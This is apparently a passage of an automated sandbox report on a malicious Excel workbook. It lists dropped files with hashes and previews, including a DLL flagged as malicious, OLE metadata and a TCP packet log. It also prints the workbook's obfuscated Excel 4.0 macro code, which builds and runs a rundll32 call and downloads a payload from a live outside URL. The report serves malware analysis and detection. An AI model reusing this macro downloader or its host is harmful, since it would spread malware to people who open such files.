                • Antivirus: ReversingLabs, Detection: 2%
                Reputation:low
                IE Cache URL:http://revolet-sa.com/files/countryyelow.php
                Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........O.N.............1...............1..........i/..92......R1..!...R1..+....(......R1......Rich............................PE..L....Kl`...........!.........@......>8..............................................................................@a..S............@.......................`..d^...................................................................................text...6u.......................... ..`.rdata..............................@..@.data........p...@...p..............@....idata...1.......@..................@....rsrc........@... ..................@..@.reloc...e...`...p..................@..B........................................................................................................................................................................................................................................................................
                C:\Users\user\AppData\Local\Temp\51CE0000
                Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                File Type:data
                Category:dropped
                Size (bytes):67964
                Entropy (8bit):7.879494848476225
                Encrypted:false
                SSDEEP:1536:Ltke3BrWGHJyW32AeWviHcM8OlMVGoIahaDHTU6hryF70m:LqeRrW2JyW32AiHD2sTU2yF70m
                MD5:69B226B04223F0B0238B83974D2EA386
                SHA1:9CC6B16D0DB0A90D17A4426B81499D88D86A6D36
                SHA-256:768DC11780C913FD228808FF9D0C912E1ADB56CC448C8DE5C0243C54E7B34AC6
                SHA-512:DCAD9D4BB120204A6A6E32279C1280BFD9831826DF9E99E21ACE8530A158B174AC5C45584B5A40934F44D07E9C95AE594AF088C621BD0620041FC3B49A4D1C43
                Malicious:false
                Reputation:low
                Preview: .U[O.0.~........&M......i.....o....~..2......\l....xy.)Y<....U.R.f.........;)|..A..5.'.../...E_D..5iC.?(..E..2.u.i.S..[S.l.k...7...C...Y-...G......X.&..n]...P....(.U3...43.q(......A...O..e)..UD.5.....PH3os...q?..8.....nA......1..0Ir.|..CY..1T..3...$.9........4...|..i........V.:....R..<.#..kd...=W.....e..}U.Q...~./qC........L3..>l%.#..).tJ....Wp.M~.....>...d....{O4..@..6......{H?..;g......^:xB.6......>.!......uFL..G>.M.........PK..........!..r.............[Content_Types].xml ...(............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                C:\Users\user\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-966771315-3019405637-367336477-1006\f554348b930ff81505ce47f7c6b7d232_ea860e7a-a87f-4a88-92ef-38f744458171
                Process:C:\Windows\SysWOW64\rundll32.exe
                File Type:data
                Category:dropped
                Size (bytes):2178
                Entropy (8bit):7.0244134949223245
                Encrypted:false
                SSDEEP:48:Kb6Uhj56fOgWh3cvwhzqHb6UhB6LHf+6snQvOahBMcF:Kb6EZmEqHb6Ce2p6F
                MD5:32026F85F5458AF52500D88C74181342
                SHA1:8DD0C3CBA5315A72899EC2135E0F88F0EF86FEA5
                SHA-256:6146AADF5EBB1EFE3AB3973AD286F31AF5E201DF1C73CFF1E88BFCA64202F111
                SHA-512:7C6848CC4BF7453DF99B7EC45A76A2A1C0FC2755A56FD3235978361E0457D76028565008E2DF0DD582BDBF73AD44301C2F2A4F56287F4DED60C14CEDDF789B28
                Malicious:false
                Reputation:low
                Preview: ........................................user.....................\...................user.....................RSA1H.......?...........}...h8...B~k..!.R..<.HN:D...tW....5g.n.xLu5..tI. .q5e.. ........................z..O......o(..O4.E..G.%......,...C.r.y.p.t.o.A.P.I. .P.r.i.v.a.t.e. .K.e.y....f...... ....E`.....uA./.......U>...................... ....A^Y........u..*`&!q...}./.k._o*......5a.}.P.L#2\E8......b`LDn\......TL.A*^..;.%....y...J..m.+,...&.7.`..Y..(..I...I....s4.U-..%..T.S~X....x..8........@o.C).44.....z|..Y.?k..q.......j.N.....Lo..w0.@.....J..'>-.......#@Q.[.+^'..].9X..6.....g7.Fg..si<..v.{....(-x..:V./_<.1...iYDW...{O...K.A8s...J....v.....&..GQI.k....Fq.$ly..gHJ9..qK.3..d....ve...xR..X1..~...E.H..m..-.iyr......eXx...ErQ.$N..lH...x...H.0..._N.V?...@....c...5\X.".'A.....!...b0....).j..0Q.>a.Q. L).C#......V/OS.U.B............z..O......o(..O4.E..G.%..........E.x.p.o.r.t. .F.l.a.g....f...... .....d-..;....=o.....VYS.....h.G9............. .....U.0...
                C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\Desktop.LNK
                Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Read-Only, Directory, ctime=Tue Oct 17 10:04:00 2017, mtime=Wed Apr 7 03:02:34 2021, atime=Wed Apr 7 03:02:34 2021, length=8192, window=hide
                Category:dropped
                Size (bytes):867
                Entropy (8bit):4.473479259150778
                Encrypted:false
                SSDEEP:12:85QHiXcLgXg/XAlCPCHaX7B8NB/vVUKUX+WnicvbwbDtZ3YilMMEpxRljK6TdJP8:85QiXK/XTr6NEYegDv3qfrNru/
                MD5:8E28D7ED19E162195111288F4BAAC845
                SHA1:CB2FECDBF220BA4F7ACCAB9B686D04DA7A5F7EA8
                SHA-256:7721E15E75EFC840BC2ABFC8C133E52FC25160C7D1921AF8D4A8F006C2400A66
                SHA-512:59B73496DDB43A82036E15E499FE16D1842DC4095143BAC93129AA9D8F3100A223A3A9BB18B3344772D782639950268C4F8C9FB03D5B5402D309A4DC9E11986F
                Malicious:false
                Reputation:low
                Preview: L..................F...........7G...iF.b+...iF.b+... ......................i....P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X*...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1......Q.y..user.8......QK.X.Q.y*...&=....U...............A.l.b.u.s.....z.1......RR ..Desktop.d......QK.X.RR *..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.......i...............-...8...[............?J......C:\Users\..#...................\\688098\Users.user\Desktop.......\.....\.....\.....\.....\.D.e.s.k.t.o.p.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1.0.0.6.............`.......X.......688098..........D_....3N...W...9r.[.*.......}EkD_....3N...W...9r.[.*.......}Ek....
                C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\SecuriteInfo.com.Heur.4923.LNK
                Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Wed Apr 7 03:02:22 2021, mtime=Wed Apr 7 03:02:34 2021, atime=Wed Apr 7 03:02:34 2021, length=92160, window=hide
                Category:dropped
                Size (bytes):2188
                Entropy (8bit):4.560543176315966
                Encrypted:false
                SSDEEP:48:8HD6/XT+N3zaHhLbHhLfQh2HD6/XT+N3zaHhLbHhLfQ/:8+/X6N3ObfQh2+/X6N3ObfQ/
                MD5:7DD685413EF4D89A020109D0F6F51E52
                SHA1:AB9EACA8EED566B3E6CE5C911AC20CFAB4B519EF
                SHA-256:64BBE802CF5EDF3A618673534AE194A6DD897777E8C6BD9B8E0AAC4CAD22F8A6
                SHA-512:17DFD5F663A1D8F18E3F4B6F4F25099ECAE45F7E1A8BAEB8982D1A8763A9F65D22B0D690D727C02CBE490B495022DFFEE429CD628A96649F0452E59FA826B989
                Malicious:false
                Reputation:low
                Preview: L..................F.... ...8...b+...iF.b+....M.b+...h...........................P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X*...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1......Q.y..user.8......QK.X.Q.y*...&=....U...............A.l.b.u.s.....z.1......RL ..Desktop.d......QK.X.RL *..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.......2......RN .SECURI~1.XLS..j......RL .RL *...-.....................S.e.c.u.r.i.t.e.I.n.f.o...c.o.m...H.e.u.r...4.9.2.3...x.l.s.......................-...8...[............?J......C:\Users\..#...................\\688098\Users.user\Desktop\SecuriteInfo.com.Heur.4923.xls.5.....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.S.e.c.u.r.i.t.e.I.n.f.o...c.o.m...H.e.u.r...4.9.2.3...x.l.s.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1.0.0.6.............`.....
                C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat
                Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                File Type:ASCII text, with CRLF line terminators
                Category:dropped
                Size (bytes):131
                Entropy (8bit):4.807590888661823
                Encrypted:false
                SSDEEP:3:oyBVomM0bGY6YCuscbGY6YCmM0bGY6YCv:dj60QY7QYU0QYs
                MD5:CB194388983FF45057D1112C8A8ECD05
                SHA1:932BA73D18BE24F3BE3D3BF370E344B5A4680019
                SHA-256:7B4232CBF84DD4BD653C4D721A934981E65173F5032287C788F5790B6DBB867B
                SHA-512:D69AA648D291FABB496DC5F2C1BAF1C850F51CE107938CEC13EDCECB664C3F066D945B0C5ECB06AC53D0ACC6F7B4543C698C245CF8C78C8CCCA5A30E046C4AD6
                Malicious:false
                Reputation:low
                Preview: Desktop.LNK=0..[xls]..SecuriteInfo.com.Heur.4923.LNK=0..SecuriteInfo.com.Heur.4923.LNK=0..[xls]..SecuriteInfo.com.Heur.4923.LNK=0..
                C:\Users\user\Desktop\02CE0000
                Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                File Type:Applesoft BASIC program data, first line number 16
                Category:dropped
                Size (bytes):127008
                Entropy (8bit):7.230317944430852
                Encrypted:false
                SSDEEP:3072:ZI8rmjAItyzElBIL6lECbgBGGP5xLmuCSX2jTUqyF70xi5W2Y657WY657XI8rmju:G8rmjAItyzElBIL6lECbgBvP5NmuCSoJ
                MD5:9BCFFF4764ED600F9C98476013B7179E
                SHA1:3D5EC66CF26FAF7BCCC4C16644E6700B4DE01C69
                SHA-256:2D39DA68CE613447388F86BBD992865CC9ED9905EA99DA1A21EF30304C7A43CB
                SHA-512:B5EFC52059FC8E91BD100CE3F3FC67E659DBC2D96F445E5E2F51FBA12A3D4365EF9D87E11367D146CE3FF2AAEBAA937721EFE900830A63D891F21616AD75F9B0
                Malicious:false
                Reputation:low
                Preview: ........g2..........................\.p....user B.....a.........=.................................................=.....i..9J.8.......X.@...........".......................1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...,...8...........C.a.l.i.b.r.i.1.......8...........C.a.l.i.b.r.i.1.......8...........C.a.l.i.b.r.i.1...h...8...........C.a.m.b.r.i.a.1.......4...........C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1.......?...........C.a.l.i.b.r.i.1...@...8...........C.a.l.i.b.r.i.1...@...............C.a.l.i.b.r.i.1.......?...........C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1.........
                C:\Users\user\sdbybsd.fds
                Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                Category:dropped
                Size (bytes):688241
                Entropy (8bit):7.064532901692121
                Encrypted:false
                SSDEEP:12288:9SeIHklNAPLJNfQPJt7TQJK7FvEVxw0xxteW:AklUjfQHDezxxtx
                MD5:7DF0611CD75FA4C02B29070728C37247
                SHA1:1095F8922D93458EFBC97612D8A5DEA8DB8325A5
                SHA-256:AC17E1F54B9F800D874E1D012E541FC037BD1A31EE3E8F631A454F2D1DE6ADA1
                SHA-512:167B19FE1154C3988A546F9626CD8918363EAB58D5BB49106000EF4E6E9AC0174A04B7341A67BF85CA1F9AB40C409F878C4AFA07BE941FEAADA7AFA996A4EA59
                Malicious:true
                Antivirus:
                • Antivirus: ReversingLabs, Detection: 2%
                Reputation:low
                Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........O.N.............1...............1..........i/..92......R1..!...R1..+....(......R1......Rich............................PE..L....Kl`...........!.........@......>8..............................................................................@a..S............@.......................`..d^...................................................................................text...6u.......................... ..`.rdata..............................@..@.data........p...@...p..............@....idata...1.......@..................@....rsrc........@... ..................@..@.reloc...e...`...p..................@..B........................................................................................................................................................................................................................................................................

                Static File Info

                General

                File type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, Code page: 1251, Last Saved By: 5, Name of Creating Application: Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Tue Apr 6 15:04:37 2021, Security: 0
                Entropy (8bit):3.087349849990019
                TrID:
                • Microsoft Excel sheet (30009/1) 78.94%
                • Generic OLE2 / Multistream Compound File (8008/1) 21.06%
                File name:SecuriteInfo.com.Heur.4923.xls
                File size:267776
                MD5:e56e32e50718813c2a9428de1d3ba674
                SHA1:90cfd7975eadf45a34361e1a1def62ab1d81cad1
                SHA256:56af77e2f4b36f94264cbb975bbea753fa5a4b2bec98a4fe8235d5ec28543fcb
                SHA512:8f6806518e709bcdc4f300529f1441cd16fcd274c91b4fc610966e818b25aed5edcb0b97c07d4ea060ebeef470c9ce6f67e8e6d99a6eec7c7ce0d5f1ff8c07ab
                SSDEEP:6144:JcPiTQAVW/89BQnmlcGvgZ7rDjo8UOMIJK+xTh0+:Fh+
                File Content Preview:........................>......................................................................................................................................................................................................................................

                File Icon

                Icon Hash:e4eea286a4b4bcb4

                Static OLE Info

                General

                Document Type:OLE
                Number of OLE Files:1

                OLE File "SecuriteInfo.com.Heur.4923.xls"

                Indicators

                Has Summary Info:True
                Application Name:Microsoft Excel
                Encrypted Document:False
                Contains Word Document Stream:False
                Contains Workbook/Book Stream:True
                Contains PowerPoint Document Stream:False
                Contains Visio Document Stream:False
                Contains ObjectPool Stream:
                Flash Objects Count:
                Contains VBA Macros:True

                Summary

                Code Page:1251
                Last Saved By:5
                Create Time:2006-09-16 00:00:00
                Last Saved Time:2021-04-06 14:04:37
                Creating Application:Microsoft Excel
                Security:0

                Document Summary

                Document Code Page:1251
                Thumbnail Scaling Desired:False
                Contains Dirty Links:False

                Streams

                Stream Path: \x5DocumentSummaryInformation, File Type: data, Stream Size: 4096
                General
                Stream Path:\x5DocumentSummaryInformation
                File Type:data
                Stream Size:4096
                Entropy:0.342986545458
                Base64 Encoded:False
                Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , . . 0 . . . . . . . . . . . . . . . 0 . . . . . . . 8 . . . . . . . @ . . . . . . . H . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . D o c u S i g n . . . . . D o c s 3 . . . . . D o c s 1 . . . . . D o c s 2 . . . . . D o c s 4 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . E x c e l 4 . 0 . . . . . . . . . . . .
                Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 d0 00 00 00 05 00 00 00 01 00 00 00 30 00 00 00 0b 00 00 00 38 00 00 00 10 00 00 00 40 00 00 00 0d 00 00 00 48 00 00 00 0c 00 00 00 8d 00 00 00 02 00 00 00 e3 04 00 00 0b 00 00 00 00 00 00 00 0b 00 00 00 00 00 00 00 1e 10 00 00 05 00 00 00
                Stream Path: \x5SummaryInformation, File Type: data, Stream Size: 4096
                General
                Stream Path:\x5SummaryInformation
                File Type:data
                Stream Size:4096
                Entropy:0.247521269318
                Base64 Encoded:False
                Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . . . + ' . . 0 . . . . . . . . . . . . . . . 8 . . . . . . . @ . . . . . . . L . . . . . . . d . . . . . . . p . . . . . . . | . . . . . . . . . . . . . . . . . . . 5 . . . . . . . . . . . M i c r o s o f t E x c e l . @ . . . . . | . # . . . @ . . . . H L . . * . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 84 00 00 00 06 00 00 00 01 00 00 00 38 00 00 00 08 00 00 00 40 00 00 00 12 00 00 00 4c 00 00 00 0c 00 00 00 64 00 00 00 0d 00 00 00 70 00 00 00 13 00 00 00 7c 00 00 00 02 00 00 00 e3 04 00 00 1e 00 00 00 04 00 00 00 35 00 00 00 1e 00 00 00
                Stream Path: Book, File Type: Applesoft BASIC program data, first line number 8, Stream Size: 255780
                General
                Stream Path:Book
                File Type:Applesoft BASIC program data, first line number 8
                Stream Size:255780
                Entropy:3.03349063455
                Base64 Encoded:True
                Data ASCII:. . . . . . . . . 7 . . . . . . . . . . . . . . . . . . . . . . . . \\ . p . . 5 B . . . . . . . . . . . . . . . . . . . . . . . D o c s 1 . . ! . . . . . . . . . . . . . . . : . . . . . . . . . . . . . . . . 7 . . . . . . . . . . . . . . . . . . = . . . . . i . . 9 J . 8 . . . . . . . X .
                Data Raw:09 08 08 00 00 05 05 00 17 37 cd 07 e1 00 00 00 c1 00 02 00 00 00 bf 00 00 00 c0 00 00 00 e2 00 00 00 5c 00 70 00 01 35 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20

                Macro 4.0 Code

                ,,,,,,"=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=FORMULA(Docs3!$BE$26&Docs3!$BE$27&Docs3!$BE$28&""n"",BV9)=ACOS(4244)=EXP(452)=ACOS(4244)=EXP(452)=ACOS(4244)=EXP(452)=ACOS(4244)=EXP(452)=ACOS(4244)=EXP(452)=ACOS(4244)=EXP(452)=ACOS(4244)=EXP(452)=ACOS(4244)=EXP(452)=ACOS(4244)=EXP(452)=ACOS(4244)=EXP(452)=ACOS(4244)=EXP(452)=ACOS(4244)=EXP(452)=ACOS(4244)=EXP(452)=ACOS(4244)=EXP(452)=ACOS(4244)=EXP(452)=ACOS(4244)=EXP(452)=ACOS(4244)=EXP(452)=ACOS(4244)=EXP(452)=ACOS(4244)=EXP(452)=ACOS(4244)=EXP(452)=ACOS(4244)=EXP(452)=Docs2!AI20()",,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=EXEC(""r""&Docs3!BB33&Docs3!BB37&Docs3!BM23&Docs3!BI33&Docs3!BI36)=ACOS(42424)=ATAN(4254254)=ACOS(42424)=ATAN(4254254)=ACOS(42424)=ATAN(4254254)=ACOS(42424)=ATAN(4254254)=ACOS(42424)=ATAN(4254254)=ACOS(42424)=ATAN(4254254)=ACOS(42424)=ATAN(4254254)=ACOS(42424)=ATAN(4254254)=ACOS(42424)=ATAN(4254254)=ACOS(42424)=ATAN(4254254)=Docs4!BA9()",,,,,,
                ,,http://,,,"=""php""",,"=""revolet-sa.com/files/countryyelow""",,,,,,,,,,,,,,,,,,,,,,,"=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=FORMULA.ARRAY(""U""&Docs3!$BH$26&Docs3!$BH$27&Docs3!$BH$28&Docs3!$BH$29,Docs1!BV10)=ACOS(4244)=EXP(452)=ACOS(4244)=EXP(452)=ACOS(4244)=EXP(452)=ACOS(4244)=EXP(452)=ACOS(4244)=EXP(452)=ACOS(4244)=EXP(452)=ACOS(4244)=EXP(452)=ACOS(4244)=EXP(452)=ACOS(4244)=EXP(452)=ACOS(4244)=EXP(452)=ACOS(4244)=EXP(452)=ACOS(4244)=EXP(452)=ACOS(4244)=EXP(452)=ACOS(4244)=EXP(452)=ACOS(4244)=EXP(452)=ACOS(4244)=EXP(452)=ACOS(4244)=EXP(452)=ACOS(4244)=EXP(452)=ACOS(4244)=EXP(452)=ACOS(4244)=EXP(452)=ACOS(4244)=EXP(452)",,,,,,,,,,"=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=CALL(Docs1!BV9,Docs1!BV10,Docs3!BK26&Docs3!BK28,0,before.3.13.34.sheet!AK14&before.3.13.34.sheet!AK15&Docs3!BP25&before.3.13.34.sheet!AN14,Docs3!BM23,0,0)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=Docs1!$AX$27()",,,,,
                =HALT()

                Network Behavior

                Network Port Distribution

                TCP Packets

                TimestampSource PortDest PortSource IPDest IP
                Apr 6, 2021 21:02:59.059638023 CEST4916580192.168.2.22192.232.249.186
                Apr 6, 2021 21:02:59.244443893 CEST8049165192.232.249.186192.168.2.22
                Apr 6, 2021 21:02:59.244602919 CEST4916580192.168.2.22192.232.249.186
                Apr 6, 2021 21:02:59.245107889 CEST4916580192.168.2.22192.232.249.186
                Apr 6, 2021 21:02:59.429975033 CEST8049165192.232.249.186192.168.2.22
                Apr 6, 2021 21:02:59.806935072 CEST8049165192.232.249.186192.168.2.22
                Apr 6, 2021 21:02:59.806989908 CEST8049165192.232.249.186192.168.2.22
                Apr 6, 2021 21:02:59.807019949 CEST8049165192.232.249.186192.168.2.22
                Apr 6, 2021 21:02:59.807049990 CEST8049165192.232.249.186192.168.2.22
                Apr 6, 2021 21:02:59.807089090 CEST8049165192.232.249.186192.168.2.22
                Apr 6, 2021 21:02:59.807125092 CEST8049165192.232.249.186192.168.2.22
                Apr 6, 2021 21:02:59.807157993 CEST4916580192.168.2.22192.232.249.186
                Apr 6, 2021 21:02:59.807180882 CEST8049165192.232.249.186192.168.2.22
                Apr 6, 2021 21:02:59.807185888 CEST4916580192.168.2.22192.232.249.186
                Apr 6, 2021 21:02:59.807221889 CEST4916580192.168.2.22192.232.249.186
                Apr 6, 2021 21:02:59.807224035 CEST8049165192.232.249.186192.168.2.22
                Apr 6, 2021 21:02:59.807261944 CEST8049165192.232.249.186192.168.2.22
                Apr 6, 2021 21:02:59.807266951 CEST4916580192.168.2.22192.232.249.186
                Apr 6, 2021 21:02:59.807296038 CEST4916580192.168.2.22192.232.249.186
                Apr 6, 2021 21:02:59.807301998 CEST8049165192.232.249.186192.168.2.22
                Apr 6, 2021 21:02:59.807339907 CEST4916580192.168.2.22192.232.249.186
                Apr 6, 2021 21:02:59.807357073 CEST4916580192.168.2.22192.232.249.186
                Apr 6, 2021 21:02:59.816087961 CEST4916580192.168.2.22192.232.249.186
                Apr 6, 2021 21:02:59.992163897 CEST8049165192.232.249.186192.168.2.22
                Apr 6, 2021 21:02:59.992301941 CEST8049165192.232.249.186192.168.2.22
                Apr 6, 2021 21:02:59.992341995 CEST4916580192.168.2.22192.232.249.186
                Apr 6, 2021 21:02:59.992351055 CEST8049165192.232.249.186192.168.2.22
                Apr 6, 2021 21:02:59.992372036 CEST4916580192.168.2.22192.232.249.186
                Apr 6, 2021 21:02:59.992388010 CEST8049165192.232.249.186192.168.2.22
                Apr 6, 2021 21:02:59.992424965 CEST8049165192.232.249.186192.168.2.22
                Apr 6, 2021 21:02:59.992439985 CEST4916580192.168.2.22192.232.249.186
                Apr 6, 2021 21:02:59.992448092 CEST4916580192.168.2.22192.232.249.186
                Apr 6, 2021 21:02:59.992463112 CEST8049165192.232.249.186192.168.2.22
                Apr 6, 2021 21:02:59.992499113 CEST8049165192.232.249.186192.168.2.22
                Apr 6, 2021 21:02:59.992503881 CEST4916580192.168.2.22192.232.249.186
                Apr 6, 2021 21:02:59.992548943 CEST8049165192.232.249.186192.168.2.22
                Apr 6, 2021 21:02:59.992556095 CEST4916580192.168.2.22192.232.249.186
                Apr 6, 2021 21:02:59.992590904 CEST8049165192.232.249.186192.168.2.22
                Apr 6, 2021 21:02:59.992620945 CEST4916580192.168.2.22192.232.249.186
                Apr 6, 2021 21:02:59.992628098 CEST8049165192.232.249.186192.168.2.22
                Apr 6, 2021 21:02:59.992660046 CEST4916580192.168.2.22192.232.249.186
                Apr 6, 2021 21:02:59.992666960 CEST8049165192.232.249.186192.168.2.22
                Apr 6, 2021 21:02:59.992705107 CEST8049165192.232.249.186192.168.2.22
                Apr 6, 2021 21:02:59.992706060 CEST4916580192.168.2.22192.232.249.186
                Apr 6, 2021 21:02:59.992741108 CEST8049165192.232.249.186192.168.2.22
                Apr 6, 2021 21:02:59.992741108 CEST4916580192.168.2.22192.232.249.186
                Apr 6, 2021 21:02:59.992779016 CEST8049165192.232.249.186192.168.2.22
                Apr 6, 2021 21:02:59.992785931 CEST4916580192.168.2.22192.232.249.186
                Apr 6, 2021 21:02:59.992815018 CEST8049165192.232.249.186192.168.2.22
                Apr 6, 2021 21:02:59.992844105 CEST4916580192.168.2.22192.232.249.186
                Apr 6, 2021 21:02:59.992862940 CEST8049165192.232.249.186192.168.2.22
                Apr 6, 2021 21:02:59.992887974 CEST4916580192.168.2.22192.232.249.186
                Apr 6, 2021 21:02:59.992904902 CEST8049165192.232.249.186192.168.2.22
                Apr 6, 2021 21:02:59.992930889 CEST4916580192.168.2.22192.232.249.186
                Apr 6, 2021 21:02:59.992942095 CEST8049165192.232.249.186192.168.2.22
                Apr 6, 2021 21:02:59.992973089 CEST4916580192.168.2.22192.232.249.186
                Apr 6, 2021 21:02:59.992980003 CEST8049165192.232.249.186192.168.2.22
                Apr 6, 2021 21:02:59.993019104 CEST8049165192.232.249.186192.168.2.22
                Apr 6, 2021 21:02:59.993021965 CEST4916580192.168.2.22192.232.249.186
                Apr 6, 2021 21:02:59.993073940 CEST4916580192.168.2.22192.232.249.186
                Apr 6, 2021 21:02:59.997370958 CEST4916580192.168.2.22192.232.249.186
                Apr 6, 2021 21:03:00.177957058 CEST8049165192.232.249.186192.168.2.22
                Apr 6, 2021 21:03:00.178039074 CEST8049165192.232.249.186192.168.2.22
                Apr 6, 2021 21:03:00.178066969 CEST8049165192.232.249.186192.168.2.22
                Apr 6, 2021 21:03:00.178098917 CEST8049165192.232.249.186192.168.2.22
                Apr 6, 2021 21:03:00.178247929 CEST4916580192.168.2.22192.232.249.186
                Apr 6, 2021 21:03:00.186172009 CEST8049165192.232.249.186192.168.2.22
                Apr 6, 2021 21:03:00.186216116 CEST8049165192.232.249.186192.168.2.22
                Apr 6, 2021 21:03:00.186253071 CEST8049165192.232.249.186192.168.2.22
                Apr 6, 2021 21:03:00.186290026 CEST8049165192.232.249.186192.168.2.22
                Apr 6, 2021 21:03:00.186299086 CEST4916580192.168.2.22192.232.249.186
                Apr 6, 2021 21:03:00.186326027 CEST8049165192.232.249.186192.168.2.22
                Apr 6, 2021 21:03:00.186352968 CEST4916580192.168.2.22192.232.249.186
                Apr 6, 2021 21:03:00.186364889 CEST8049165192.232.249.186192.168.2.22
                Apr 6, 2021 21:03:00.186388969 CEST4916580192.168.2.22192.232.249.186
                Apr 6, 2021 21:03:00.186403036 CEST8049165192.232.249.186192.168.2.22
                Apr 6, 2021 21:03:00.186450958 CEST8049165192.232.249.186192.168.2.22
